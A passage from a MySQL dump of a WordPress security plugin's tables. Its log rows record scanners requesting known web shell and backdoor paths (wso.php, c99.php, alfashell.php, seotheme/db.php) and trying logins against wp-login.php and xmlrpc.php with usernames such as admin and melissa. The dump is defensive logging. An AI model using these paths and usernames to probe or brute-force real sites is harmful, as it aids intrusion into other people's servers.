743863963,'',0,1681920464.6498,55,'sBWOKLu9Hhfm5UPbEeZ4QXGy','','19|0|0|0|cmdev-site1.com/f.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920466.4195,55,'Ttm95usYlMVIeBc6J0Q2HAfb','','19|0|0|0|cmdev-site1.com/5.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920467.8560,55,'ekuqVWGUfID1BcvAimJLobzt','','19|0|0|0|cmdev-site1.com/v.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920469.5414,55,'ayl1eLNVSEprBftzJ8qAgsDd','','19|0|0|0|cmdev-site1.com/w3llstore.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920471.0077,55,'2Ji3OChQTtvnWxL4eGVUPuwq','','19|0|0|0|cmdev-site1.com/images/about.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920472.5032,55,'EmAC2UQ6HG9Tdv53alXi8yuj','','19|0|0|0|cmdev-site1.com/rss.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920473.8764,55,'rM4dpZlqDXyOnQcLvP2wetWB','','19|0|0|0|cmdev-site1.com/wp-info.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920475.4538,55,'QcIYD48qAFHzwpLVxfro7Z3n','','19|0|0|0|cmdev-site1.com/m.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920477.4332,55,'0xcOWBAHKMTLQGdrs8Z1pkUD','','19|0|0|0|cmdev-site1.com/wso.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920482.5471,55,'CvzqkbayPloiQjJ179VEfhRw','','19|0|0|0|cmdev-site1.com/1index.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920484.0288,55,'6fCGByIX7tnK8JTDehUWumkV','','19|0|0|0|cmdev-site1.com/public/403.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920485.5146,55,'Qzo7Tbj12ehUD9GuOtq0xlsX','','19|0|0|0|cmdev-site1.com/blog.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920487.2700,55,'wYEDs2tWg6jQx1TXBFqRCeay','','19|0|0|0|cmdev-site1.com/c99.php',0,19,0),('45.61.188.154',759020698,'melissa',0,1681920488.6054,7,'Wgi3dUMujhbI984EKwyYCkA2','','0|0|0|0|cmdev-site1.com/wp-login.php',0,0,0),('103.241.64.155',1743863963,'',0,1681920488.8919,55,'bZcqtKP102IJLwx35QljrHTS','','19|0|0|0|cmdev-site1.com/autoload_classmap.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920490.2808,55,'ACxUQp8569aHSvRghiKonsDt','','19|0|0|0|cmdev-site1.com/b.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920491.6630,55,'e8AHSm1Kf3snDpzGca0JCE7W','','19|0|0|0|cmdev-site1.com/alfashell.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920493.2121,55,'cfO05vkZ6dUNpsYRMCJGEagD','','19|0|0|0|cmdev-site1.com/bypass.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920494.5206,55,'FRQbX6w2sPk147oCOUrYJ0Vj','','19|0|0|0|cmdev-site1.com/content.php',0,19,0),('103.241.64.155',1743863963,'',0,1681920496.1536,55,'YSKLT9ytmVksGgOQvNpWz3bi','','19|0|0|0|cmdev-site1.com/wp-content/about.php',0,19,0),('45.61.188.154',759020698,'techspt',0,1681920501.3833,7,'uihJptw0mF1vB2kAzEaXI8Lx','','0|0|0|0|cmdev-site1.com/wp-login.php',0,0,0),('45.61.188.154',759020698,'',0,1681920501.3862,10,'uihJptw0mF1vB2kAzEaXI8Lx','','701|0|0|0|cmdev-site1.com/wp-login.php',0,701,0),('54.191.137.17',918522129,'',0,1681920802.5753,50,'RxHmC9BTQYAdzXt5leWE3ciN','','10|0|0|0|cmdev-site1.com/wp-login.php',0,10,0),('54.191.137.17',918522129,'',0,1681920804.3537,50,'Wqmf7KztOgsMFPxJaZ3YhAHj','','10|0|0|0|cmdev-site1.com/wp-login.php',0,10,0),('54.191.137.17',918522129,'',0,1681920896.4232,50,'SYiFqB3eI7CnGsxDEX1zoA2L','','10|0|0|0|cmdev-site1.com/wp-login.php',0,10,0),('54.191.137.17',918522129,'',0,1681920898.0973,50,'6FqX4A0VKSa8x2efuwJPrsGO','','10|0|0|0|cmdev-site1.com/wp-login.php',0,10,0),('205.185.124.254',3451485438,'techspt',0,1681921485.6040,7,'s41GQDR0VwZTnzkXPguNpMAK','','0|0|0|0|www.cmdev-site1.com/wp-login.php',0,0,0),('205.185.124.254',3451485438,'melissa',0,1681921501.5744,7,'PNnutd6RTs9hSyqlmrvcw35z','','0|0|0|0|www.cmdev-site1.com/wp-login.php',0,0,0),('205.185.124.254',3451485438,'',0,1681921501.5818,10,'PNnutd6RTs9hSyqlmrvcw35z','','701|0|0|0|www.cmdev-site1.com/wp-login.php',0,701,0),('91.231.84.41',1541887017,'techspt',0,1681921614.5716,152,'3Akp6ivJtaugnKPQIehTHwLS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('209.141.61.84',3515694420,'melissa',0,1681921772.1892,152,'NCV69wzh2EqDjpLRM0YOWel7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('209.141.61.84',3515694420,'techspt',0,1681921778.0934,152,'IA7ZQNEdsYckX0JlMg1xzUD8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('209.141.61.84',3515694420,'',0,1681921778.0992,10,'IA7ZQNEdsYckX0JlMg1xzUD8','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('209.141.49.234',3515691498,'techspt',0,1681922270.9812,7,'CBJNX3s1cFonlVIfR8mAk4Wy','','0|0|0|0|cmdev-site1.com/wp-login.php',0,0,0),('47.243.171.230',804498406,'wordpress',0,1681922699.4489,152,'3ERf1CpzoqdYrkgNFPI8M72w','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.195.112.30',3267588126,'admin',0,1681922700.7532,152,'b4JQhSu8CR6pyOgPaefnBcNv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'admin',0,1681922700.9199,152,'6aeuZ0RHAjPS8tWVUsv9FiTk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('47.243.171.230',804498406,'',0,1681922700.9242,10,'6aeuZ0RHAjPS8tWVUsv9FiTk','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('148.66.147.2',2487390978,'admin',0,1681922708.7744,152,'OZLkgI5TH7Fu0hYCw1zWPpNm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'test',0,1681922709.5350,152,'e0NZt7KfpXaxdTFUAJE5ycuR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('72.167.125.153',1218936217,'admin',0,1681922710.5046,152,'f2rP4EyWJ8wMjl0YBADnCvOX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('161.97.120.186',2707519674,'support',0,1681922719.9715,152,'j7GTpnsJhaImNOWFQdqb5VRk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.42.49.228',1110061540,'admin',0,1681922720.1178,152,'jFvd94KxslTeyoru1knaQ8Oz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.190.132.194',1807647938,'developer',0,1681922723.6693,152,'0uqdGvZfLI6zSOl2cJU7bR3m','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.109.150.204',1047369420,'wwwadm',0,1681922723.9519,152,'4Hlx6s2uK0Tp8nNtzaYFkgyP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.2.5.90',3103917402,'admin',0,1681922726.7403,152,'hBFcUv04fnqCSWEH6lPZj1w3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('74.50.80.101',1244811365,'feral',0,1681922733.1299,152,'DC3cuS1Bv6leQpM8hjiz0dPw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('108.170.11.42',1823083306,'Admin',0,1681922778.5576,152,'DVO0oRebdI3f9KlQuamtEBYy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.61.188.109',759020653,'techspt',0,1681922819.6912,7,'PhDOkm0E4uglbYyICZMi6vWp','','0|0|0|0|www.cmdev-site1.com/wp-login.php',0,0,0),('45.61.188.109',759020653,'melissa',0,1681922854.5304,7,'dQvThMF8i4bS13BZLcRjsEJX','','0|0|0|0|www.cmdev-site1.com/wp-login.php',0,0,0),('45.61.188.109',759020653,'',0,1681922854.5402,10,'dQvThMF8i4bS13BZLcRjsEJX','','701|0|0|0|www.cmdev-site1.com/wp-login.php',0,701,0),('43.155.103.11',731604747,'admin',0,1681924386.7433,152,'HSuskWCt3r5D0Yz78oEf2PBK','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('216.250.113.143',3640291727,'Admin',0,1681924389.6423,152,'h5zHY4qRxc7BLEUIwWnMkAXS','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('162.240.222.168',2733694632,'tashi',0,1681924391.9066,152,'0gqSGnJRasmhMC5Bu4rXb9et','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.253.215.16',3120420624,'testuser',0,1681924399.5427,152,'iErxqm8TeaAjo4PMyubwJ0pZ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('123.30.238.182',2065624758,'admin',0,1681924403.9634,152,'eMyrtHWxgv4dsBwQPE3oCm1Y','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.204.46.73',1540107849,'frank',0,1681924404.6547,152,'fSMYreIp5cQVzvJiwCWN3Ll8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('52.35.72.129',874727553,'',0,1681924765.8267,55,'7cPopS2GXUNbHTzeftkEZWdB','','19|0|0|0|cmdev-site1.com/info.php',0,19,0);
/*!40000 ALTER TABLE `cerber_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_qmem`
--

DROP TABLE IF EXISTS `cerber_qmem`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_qmem` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `stamp` int(10) unsigned NOT NULL,
  KEY `ip_stamp` (`ip`,`stamp`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_qmem`
--

LOCK TABLES `cerber_qmem` WRITE;
/*!40000 ALTER TABLE `cerber_qmem` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_qmem` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_traffic`
--

DROP TABLE IF EXISTS `cerber_traffic`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_traffic` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `hostname` varchar(250) NOT NULL DEFAULT '',
  `uri` text NOT NULL,
  `request_fields` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `request_details` mediumtext NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `processing` int(10) NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `request_method` char(8) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `wp_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `wp_type` int(10) unsigned NOT NULL DEFAULT 0,
  `is_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `blog_id` int(10) unsigned NOT NULL DEFAULT 0,
  `php_errors` text NOT NULL,
  `req_status` int(10) unsigned NOT NULL DEFAULT 0,
  KEY `stamp` (`stamp`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_traffic`
--

LOCK TABLES `cerber_traffic` WRITE;
/*!40000 ALTER TABLE `cerber_traffic` DISABLE KEYS */;
INSERT INTO `cerber_traffic` VALUES ('40.80.83.88',676352856,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9icQt06ePwEFuN7HAIj2TyCa',0,1680107370.2811,2064,'','GET',403,0,700,0,1,'',0),('40.80.83.88',676352856,'','http://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','XPN4DMTEoI9RznyevsAdwVb3',0,1680107367.5019,1768,'','POST',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/administrator/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','nLN3rM2JvDqzlIgWxt9pOQK8',0,1680100085.0711,1564,'','GET',403,0,700,0,1,'',0),('40.80.83.88',676352856,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Um4I3jMxlEP0qnXakpCW8idA',0,1680107367.5031,1743,'','GET',403,0,700,0,1,'',0),('79.110.62.85',1332624981,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','AqGLUH3TFaMwCvXzt91o5hOl',0,1680112042.6762,1404,'','POST',403,0,515,0,1,'',0),('79.110.62.85',1332624981,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','iQm5n3Cu8jrJNqlyDYpE1h0z',0,1680112041.3052,741,'','POST',403,0,515,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','PXjKnkrATFGc9C02bufoQH7l',0,1680137272.1261,630,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','https://cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Z5EzBgW3TwViIPxnC1978slD',0,1680137271.0630,489,'','GET',403,0,700,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/assets/jQuery-File-Upload/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','lEbTXU3jp1Mi7ymVrZ0v5qOf',0,1680124470.2602,1491,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/wp-content/plugins/anttt/simple.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','OvSojWwE21XUrxcmTnh0eKVG',0,1680137267.9568,1434,'','GET',403,0,700,0,1,'',0),('122.155.3.106',2056979306,'','http://cmdev-site1.com/admin.php?1944','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','LHIPfim9tCl2qbhVNFBvj7dg',0,1680213414.7045,298,'','GET',403,0,700,0,1,'',0),('122.155.3.106',2056979306,'','http://cmdev-site1.com/use.php?1915','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','jHJdpIVGfvUBWbthm2uaQlAx',0,1680213383.1951,277,'','GET',403,0,700,0,1,'',0),('5.62.58.233',87964393,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','s2RqMw8lbCLej6AQ4dWyp9KI',0,1680195033.8395,289,'','GET',403,0,700,0,1,'',0),('5.62.58.233',87964393,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ihwcByX8lYKJvpIOjUxbNTz6',0,1680195001.4193,292,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/administrator/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','b0fDgKlHSjGWNEoVwkMnJFa8',0,1680187159.3000,1499,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/oldsite/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','c37uUAiTFrlyzCt1bD64R2n8',0,1680186950.5425,279,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/site/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','iEpBMjx2GqeZr6F3WL1N9nXh',0,1680186948.9027,280,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/backup/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','amP8NbRh5HxSq4UIFYu1TQcg',0,1680186947.9788,298,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/cms/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','XeWEhOuRPMorIaiqfC6Q8bD2',0,1680186946.2245,294,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/web/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','Yn04jtdb39eMvhQAyCEqi5PI',0,1680186947.1173,296,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/blog/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','LnEVafIvYypkeQMmgK3ZT82l',0,1680186945.4088,282,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/old/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','w2REV41AtXnWxoLsmZqaBCyN',0,1680186942.7845,306,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/wordpress/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','086SYfLDGaKMwC3OeZgmnAcI',0,1680186943.6818,309,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/test/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','14CQrGXmfo5ejF8kSgbLRuay',0,1680186944.5368,289,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/new/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','65H8OtMySXTLD9jCiZqlza1f',0,1680186941.3321,871,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/wp/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','DzAMNWSbfiT4xrZQ0KnvXh8B',0,1680186940.0823,540,'','GET',403,0,700,0,1,'',0),('185.129.248.170',3112302762,'','http://cmdev-site1.com/wp-includes/certificates/class_api.php?1918','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','CsdOtAD2EZPbK9BjUG68zawv',0,1680213379.5120,339,'','GET',403,0,700,0,1,'',0),('185.129.248.170',3112302762,'','http://cmdev-site1.com/wp-content/plugins/w0rdpr3ssnew/class.api.php?1918','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','eQoHx80fcXDNWhqA2OLtEVCa',0,1680213356.7698,1514,'','GET',403,0,700,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/assets/plugins/jQuery-File-Upload/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','98Q01KZW7dJvYsXejVmfauTB',0,1680261434.7731,297,'','GET',403,0,700,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?redirect_to=http%3A%2F%2Fcmdev-site1.com%2Fwp-admin%2Fplugins.php&reauth=1\"}','fPJTtBQHX7NMAoCxUaK1gvOm',3,1680263629.0986,400,'','POST',302,0,600,0,1,'',510),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/plugins/seoplugins/db.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Hw3UdE81VF6cktxoehBQAaiy',0,1680303010.8608,282,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','h4atspm0gSuqfR3MQ2HUzoD6',0,1680303004.8725,295,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/plugins/seoox/alfa-rex.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','CZS1eFQdyn6uIc5jNlRW2saD',0,1680296191.6552,1842,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','bwDXsmPdp4OKZRi9fHNtJAvC',0,1680292716.1581,2538,'','GET',403,0,700,0,1,'',0),('212.142.140.81',3566111825,'','http://cmdev-site1.com/wp-content/plugins/core-fork/index.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','0jKiomBCTZOqusXRFI35Vbd8',0,1680290592.1977,392,'','GET',403,0,700,0,1,'',0),('212.142.140.81',3566111825,'','http://cmdev-site1.com/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','Kdb9xBuIfSCwFJtToNGjnAD7',0,1680290557.9996,285,'','GET',403,0,700,0,1,'',0),('165.232.164.241',2783487217,'','http://cmdev-site1.com/administrator/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','f3gQUhPXvdnJzkCm91TOpHo4',0,1680290287.4571,5241,'','GET',403,0,700,0,1,'',0),('178.128.126.187',2994765499,'','http://cmdev-site1.com/wp-admin/theme.php?f20230218','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','nzpFOoqtg3kiRxMGJCSs2jyV',0,1680297253.2394,2001,'','GET',403,0,700,0,1,'',0),('147.78.47.249',2471374841,'','http://cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Safari\\/537.36\"}','cLQKeY7UzwIDRqdC9vkJahui',0,1680297563.0808,276,'','GET',403,0,700,0,1,'',0),('178.128.126.187',2994765499,'','http://cmdev-site1.com/wp-content/plugins/task-controller/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','qRTib2K0E16pehGjIVfMDnOQ',0,1680297230.8985,447,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/themes/pridmag/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Iq8veF2T9noGD4VbWm6M0BAP',0,1680302996.7610,312,'','GET',403,0,700,0,1,'',0),('194.87.151.73',3260520265,'','http://cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie 